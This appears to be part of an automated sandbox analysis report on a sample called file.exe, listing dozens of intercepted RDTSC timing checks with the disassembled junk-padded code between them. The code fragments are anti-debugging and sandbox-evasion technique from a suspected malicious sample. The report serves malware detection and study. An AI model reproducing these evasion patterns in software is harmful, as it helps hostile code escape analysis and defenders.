              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3CD90 second address: F3CDCB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E390E37E6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F6E390E37F5h 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6E390E37ECh 0x00000020 push esi 0x00000021 pushad 0x00000022 popad 0x00000023 pop esi 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFB95B second address: EE5BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 js 00007F6E3947E06Ch 0x0000000b jmp 00007F6E3947E066h 0x00000010 call dword ptr [ebp+122D1E2Ch] 0x00000016 pushad 0x00000017 jmp 00007F6E3947E062h 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D03D second address: F3D047 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E390E37E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D047 second address: F3D066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6E3947E06Dh 0x0000000c jmp 00007F6E3947E061h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D066 second address: F3D089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 js 00007F6E390E37E6h 0x0000000b jmp 00007F6E390E37F1h 0x00000010 pop eax 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D089 second address: F3D08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D08D second address: F3D097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D097 second address: F3D09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D09D second address: F3D0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC233 second address: EFC25C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F6E3947E05Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D201 second address: F3D208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D4B7 second address: F3D4C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43E69 second address: F43E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F42C9C second address: F42CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F42CA0 second address: F42CBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6E390E37F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4322B second address: F43231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F429B2 second address: F429D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6E390E37E6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007F6E390E37F2h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F429D1 second address: F429F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E3947E069h 0x00000009 jno 00007F6E3947E056h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F429F4 second address: F429F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F429F8 second address: F42A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43BB8 second address: F43BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47D54 second address: F47D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6E3947E056h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47D5E second address: F47D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47D62 second address: F47D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnl 00007F6E3947E056h 0x0000000d jp 00007F6E3947E056h 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47EF2 second address: F47F1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6E390E37E6h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6E390E37F8h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47F1C second address: F47F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47F20 second address: F47F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4806F second address: F48081 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F6E3947E058h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F481F3 second address: F481F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A834 second address: F4A856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6E3947E056h 0x0000000a jno 00007F6E3947E056h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E3947E05Dh 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A856 second address: F4A862 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E390E37E6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A862 second address: F4A868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A868 second address: F4A86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4FD27 second address: F4FD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6E3947E05Ch 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4FD3A second address: F4FD40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4FD40 second address: F4FD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F6E3947E056h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4FE82 second address: F4FE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5011C second address: F5014A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E06Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6E3947E05Dh 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50279 second address: F50284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50284 second address: F5028D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC677 second address: EFC67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC67B second address: EFC697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E068h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC697 second address: EFC69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC69D second address: EFC6F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+122D3660h], eax 0x00000014 mov ebx, dword ptr [ebp+1247F6AAh] 0x0000001a pushad 0x0000001b mov dword ptr [ebp+122D30BDh], esi 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D36D9h], ebx 0x00000028 stc 0x00000029 popad 0x0000002a popad 0x0000002b add eax, ebx 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F6E3947E058h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 nop 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC6F8 second address: EFC6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC6FC second address: EFC706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC706 second address: EFC728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007F6E390E37FFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC728 second address: EFC758 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D36B1h], edi 0x00000010 mov di, 1CC5h 0x00000014 push 00000004h 0x00000016 mov cx, dx 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c jl 00007F6E3947E056h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51136 second address: F5113C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54BEE second address: F54C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6E3947E05Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBAA79 second address: EBAA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBAA7D second address: EBAAB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007F6E3947E061h 0x00000011 pop edi 0x00000012 jmp 00007F6E3947E066h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBAAB1 second address: EBAAC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E390E37F4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58561 second address: F5856D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6E3947E05Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5894A second address: F5894E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5894E second address: F58956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58956 second address: F5896C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E390E37F2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E3B2 second address: F5E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E3B7 second address: F5E3BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E987 second address: F5E9AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Fh 0x00000007 jnp 00007F6E3947E058h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E3947E05Bh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E9AF second address: F5E9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E9B5 second address: F5E9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F2A1 second address: F5F2B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F6E390E37E6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FE0E second address: F5FE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007F6E3947E058h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FE22 second address: F5FE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FE28 second address: F5FE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F600BE second address: F600C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F600C6 second address: F600D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F600D1 second address: F600D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F600D5 second address: F600F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f ja 00007F6E3947E056h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC1641 second address: EC164B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC164B second address: EC1652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69293 second address: F6929E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6929E second address: F692B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E061h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F692B3 second address: F692B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F696C7 second address: F696CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F696CB second address: F696CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F696CF second address: F696DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F6E3947E056h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F706A6 second address: F706BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jl 00007F6E390E37E6h 0x0000000d jp 00007F6E390E37E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F706BB second address: F706DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6E3947E056h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6E3947E062h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70A3D second address: F70A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70A46 second address: F70A75 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E3947E05Eh 0x00000008 jmp 00007F6E3947E061h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007F6E3947E056h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70BE5 second address: F70BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70BEB second address: F70BFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F6E3947E056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70D0F second address: F70D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70D13 second address: F70D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70D1E second address: F70D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6E390E37E6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70D29 second address: F70D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70D2E second address: F70D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6E390E37F8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70D4E second address: F70D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70D57 second address: F70D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71194 second address: F7119E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7119E second address: F711BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6E390E37F3h 0x0000000c jnl 00007F6E390E37E6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F711BE second address: F711F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6E3947E056h 0x00000008 jnc 00007F6E3947E056h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnl 00007F6E3947E056h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jng 00007F6E3947E056h 0x00000024 jmp 00007F6E3947E062h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F711F9 second address: F7121B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F8h 0x00000007 jbe 00007F6E390E3805h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F718C1 second address: F718D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E061h 0x00000009 rdtsc
